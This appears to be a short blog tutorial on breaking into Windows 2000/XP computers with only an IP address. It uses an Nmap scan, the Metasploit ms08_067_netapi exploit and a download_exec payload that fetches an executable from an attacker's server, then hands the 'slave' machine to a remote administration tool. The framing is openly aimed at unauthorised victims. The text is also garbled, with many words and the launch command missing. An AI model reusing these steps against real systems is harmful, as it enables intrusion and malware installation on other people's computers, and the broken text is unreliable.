Tutorial - How to infect or a computer with only IP address:
Requirements:
Nmap
Metasploit
First of all you need target IP of your victim.
Then open Metasploit Console & type db_crte.
[Usage: This will crte or connect you to a(your) database.]
Once you do that type Nmap.
[Usage: This will load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV <target IP>
[This will scan OS, Ports, and Services running on the victim's computer.]
Wait for 5 minutes to complete the scan.
Once done, Note down the OS, Ports, and Services running on the slave's computer.
Now it's time to the victim's machine.
depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's sy to them.
No matter whether they are protected by a firewall or not.
Now:
2000 (all versions SP1, SP2, SP3, SP4)
XP (all versions SP1, SP2, SP3)
Type show s
[Usage: This will show all the s in its database.]
Next you need to type use /smb/ms08_067_netapi
[Usage: This will select the /smb/ms08_067_netapi]
Now Type show targets
[Usage: This will show all targets by ]
Now Type set target 0
[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload /download_exec
[Usage: This will set the payload as /download_exec]
Then Type show options
[Usage: This will show all options in the & payload]
In window you will see many options, in which you need to
Fill only two options RHOST & URL.
Type set RHOST <xxx.xxx.xxx.xxx >
[Usage: This will set RHOST (victim's ip) to xxx.xxx.xxx.xxx]
Next Type set URLhttp://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]
Finally you need to type
[Usage: This will launch the & your slave will be infected.]
You can now control your slave with a RAT. (Remote administration tool.)
So, any versions of Win 2000-XP can be ed sily.
You can use the command db_autopwn �p �t �e.
In most cases you get a shell!
Now the final question - how to change the shell above to get access to someone's 7 or 8?
No comments:
Post a Comment